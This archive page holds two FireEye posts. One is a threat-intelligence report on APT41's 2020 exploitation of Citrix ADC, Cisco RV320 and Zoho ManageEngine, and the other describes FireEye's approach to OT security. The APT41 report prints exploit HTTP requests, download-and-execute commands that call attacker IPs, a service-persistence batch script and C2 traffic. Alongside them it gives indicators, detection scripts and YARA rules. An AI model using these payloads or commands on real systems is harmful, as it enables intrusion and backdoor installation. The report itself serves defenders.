Category Archives: Steve Miller

This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


Figure 1: Timeline of key events

The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781
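For defenders reviewing historical web or NetScaler HTTP logs, the request shape above lends itself to a simple triage heuristic. The following is a minimal Python sketch, not a production detection: it assumes one raw HTTP request or full log entry (including headers) per line, and it simply flags entries that hit the vulnerable newbm.pl script while carrying a directory-traversal NSC_USER header, as seen in Figures 2 through 4.

import re
import sys

# Request path and header pattern taken from the exploit traffic in Figures 2-4.
SCRIPT_RE = re.compile(r"/vpns/portal/scripts/newbm\.pl", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"NSC_USER:\s*\.\./", re.IGNORECASE)

def suspicious_lines(log_path):
    # Yield (line number, line) for entries that request the vulnerable Perl
    # script and also carry a directory-traversal NSC_USER header.
    with open(log_path, "r", errors="replace") as handle:
        for lineno, line in enumerate(handle, 1):
            if SCRIPT_RE.search(line) and TRAVERSAL_RE.search(line):
                yield lineno, line.rstrip()

if __name__ == "__main__":
    for lineno, line in suspicious_lines(sys.argv[1]):
        print(f"{lineno}: {line}")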

There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays that occurred between January 24 and January 30, 2020. This has been a common activity pattern for Chinese APT groups in past years as well.

Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways that we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the February 1 activity, with only the payload name changed to ‘un’.

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

Cisco Router Exploitation

On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

GET /test/fuc HTTP/1.1
Host: 66.42.98[.]220
User-Agent: Wget
Connection: close

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

66.42.98[.]220 also hosted a file at http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, the command one would execute on a Cisco RV320 router to display the current configuration.

Cisco PSIRT confirmed that fixed software addressing the noted vulnerabilities is available and asks customers to review the relevant security advisories and take appropriate action.

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, 2020, researcher Steven Seeley published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, resulting in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation, the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java-based program containing a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.
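Because the class-name toolmark is a plain string, it can be hunted for directly during triage. The sketch below is illustrative only: the ‘ysoserial/Pwner’ prefix comes from Figure 6, while the recursive file walk and the assumption that the digits after ‘Pwner’ vary per payload are ours.

import pathlib
import re
import sys

# Match the ysoserial class-name toolmark seen in Figure 6; the trailing digits
# differ per generated payload, so only the prefix is anchored.
PWNER_RE = re.compile(rb"ysoserial/Pwner\d+")

def scan(root):
    # Walk a directory tree and report files carrying the toolmark.
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue
        for match in PWNER_RE.finditer(data):
            print(f"{path}: {match.group().decode()}")

if __name__ == "__main__":
    scan(sys.argv[1])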

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation
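One way to operationalize the observation in Figure 7 is to flag the ManageEngine Desktop Central java.exe spawning cmd.exe or bitsadmin.exe, which also appears in the indicator list later in this post. The following Python sketch is hypothetical: the event dictionary fields (parent_path, child_path, command_line) are assumptions and would need to be mapped to whatever your EDR or log pipeline actually emits.

# Hypothetical detection logic for the behavior in Figure 7: ManageEngine
# Desktop Central's java.exe spawning cmd.exe or bitsadmin.exe.
SUSPICIOUS_CHILDREN = {"cmd.exe", "bitsadmin.exe"}

def is_suspicious_spawn(event):
    parent = event.get("parent_path", "").lower()
    child = event.get("child_path", "").lower().rsplit("\\", 1)[-1]
    return (
        "\\manageengine\\desktopcentral_server\\" in parent
        and parent.endswith("\\java.exe")
        and child in SUSPICIOUS_CHILDREN
    )

# Example usage with the event from Figure 7:
event = {
    "parent_path": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
    "child_path": r"C:\Windows\System32\cmd.exe",
    "command_line": "cmd /c bitsadmin /transfer bbbb ...",
}
assert is_suspicious_spawn(event)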

In both variations, the install.bat batch file was used to install persistence for a trial version of the Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"

Figure 8: Contents of install.bat
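The batch file leaves distinctive host artifacts: a svchost group named StorSyncSvc and a ServiceDll value pointing at storesyncsvc.dll. A minimal, Windows-only triage check for that registry persistence might look like the following sketch; the service name and registry paths come straight from Figure 8, while the script structure itself is ours.

# Windows-only sketch: check for the registry persistence created by install.bat
# (Figure 8), i.e. a service named StorSyncSvc whose ServiceDll points at
# storesyncsvc.dll. Read-only; intended for triage, not remediation.
import winreg

SERVICE_NAME = "StorSyncSvc"

def storsyncsvc_persistence_present():
    try:
        key = winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE,
            rf"SYSTEM\CurrentControlSet\Services\{SERVICE_NAME}\Parameters",
        )
    except FileNotFoundError:
        return False
    try:
        service_dll, _ = winreg.QueryValueEx(key, "ServiceDll")
    except FileNotFoundError:
        return False
    finally:
        winreg.CloseKey(key)
    return "storesyncsvc.dll" in service_dll.lower()

if __name__ == "__main__":
    print("StorSyncSvc persistence present:", storsyncsvc_persistence_present())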

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

Within a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address using Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions. CertUtil was used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The use of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader
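The CertUtil downloads in Figures 10 and 11 also stand out in proxy or egress logs: a Microsoft-CryptoAPI user-agent fetching an executable directly from a bare IP address. The rough filter below is a hunting sketch rather than a detection; the record field names are assumptions, and benign CryptoAPI traffic (CRL and certificate fetches) will require tuning.

import ipaddress
import re

# User-agent pattern from Figure 10; CertUtil downloads use the CryptoAPI stack.
UA_RE = re.compile(r"^Microsoft-CryptoAPI/", re.IGNORECASE)

def is_host_bare_ip(host):
    # True when the Host header is a raw IP address rather than a hostname.
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False

def is_certutil_exe_download(record):
    return (
        bool(UA_RE.match(record.get("user_agent", "")))
        and record.get("url", "").lower().endswith(".exe")
        and is_host_bare_ip(record.get("host", ""))
    )

# Example usage with the request from Figure 10:
assert is_certutil_exe_download(
    {"user_agent": "Microsoft-CryptoAPI/6.3", "url": "/2.exe", "host": "91.208.184.78"}
)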

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

Zoho ManageEngine released a short-term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long-term fix.

Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity shows how resourceful the group is and how quickly it can leverage newly disclosed vulnerabilities to its advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S.-based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

Indicators

CVE-2019-19781 Exploitation (Citrix Application Delivery Controller)

  • 66.42.98[.]220
  • CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’
  • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’
  • CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’
  • /tmp/bsd
  • /tmp/un

Cisco Router Exploitation

  • 66.42.98[.]220
  • ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)
  • ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc)

CVE-2020-10189 Exploitation (Zoho ManageEngine Desktop Central)

  • 66.42.98[.]220
  • 91.208.184[.]78
  • 74.82.201[.]8
  • exchange.dumb1[.]com
  • install.bat (MD5: 7966c2c546b71e800397a67f942858d0)
  • storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)
  • C:\Windows\Temp\storesyncsvc.dll
  • C:\Windows\Temp\install.bat
  • 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)
  • C:\Users\[redacted]\install.bat
  • TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)
  • C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe
  • Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78
  • PowerShell downloading files with Net.WebClient

Detecting the Techniques

FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Endpoint Security

  • BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)
  • CERTUTIL.EXE DOWNLOADER A (UTILITY)
  • Generic.mg.5909983db4d9023e
  • Generic.mg.3e856162c36b5329
  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)
  • SAMWELL (BACKDOOR)
  • SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

Network Security

  • Backdoor.Meterpreter
  • DTI.Callback
  • Exploit.CitrixNetScaler
  • Trojan.METASTAGE
  • Exploit.ZohoManageEngine.CVE-2020-10198.Pwner
  • Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

Helix

  • CITRIX ADC [Suspicious Commands]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
  • EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
  • MALWARE METHODOLOGY [Certutil User-Agent]
  • WINDOWS METHODOLOGY [BITSadmin Transfer]
  • WINDOWS METHODOLOGY [Certutil Downloader]

MITRE ATT&CK Technique Mapping

  • Initial Access: External Remote Services (T1133), Exploit Public-Facing Application (T1190)
  • Execution: PowerShell (T1086), Scripting (T1064)
  • Persistence: New Service (T1050)
  • Privilege Escalation: Exploitation for Privilege Escalation (T1068)
  • Defense Evasion: BITS Jobs (T1197), Process Injection (T1055)
  • Command and Control: Remote File Copy (T1105), Commonly Used Port (T1043), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Others are broader in aperture, building larger haystacks for further automation or processing in threat hunting systems.

import "pe"

rule ExportEngine_APT41_Loader_String
{
    meta:
        author = "@stvemillertime"
        description = "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"
    strings:
        $pcre = /loader_[\x00-\x7F]{1,}\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_ShortName
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is a single character"
    strings:
        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_xArch
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is something like x32.dat"
    strings:
        $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule RareEquities_LibTomCrypt
{
    meta:
        author = "@stvemillertime"
        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."
    strings:
        $a1 = "LibTomMath"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1
}

rule RareEquities_KCP
{
    meta:
        author = "@stvemillertime"
        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."
    strings:
        $a01 = "[RO] %ld bytes"
        $a02 = "recv sn=%lu"
        $a03 = "[RI] %d bytes"
        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"
        $a05 = "input psh: sn=%lu ts=%lu"
        $a06 = "input probe"
        $a07 = "input wins: %lu"
        $a08 = "rcv_nxt=%lu\\n"
        $a09 = "snd(buf=%d, queue=%d)\\n"
        $a10 = "rcv(buf=%d, queue=%d)\\n"
        $a11 = "rcvbuf"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)
}

rule ConventionEngine_Term_Users
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Term_Desktop
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Anomaly_MultiPDB_Double
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2
}

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area for most intrusions transcends architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as used in IT, which serve as an avenue of approach for impacting physical assets or control of a physical process. The oft-touted air gap is in many cases a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”: predominantly networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, and which are used as stepping stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye has observed a consistent pattern across almost all OT security incidents: there is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle, when viewed like this, begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity at any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.


Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.


Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions, from both independent research and first-hand incident response experience, has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behavior is among the most important components of IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.


Figure 3: TTPs seen across both IT and OT incidents

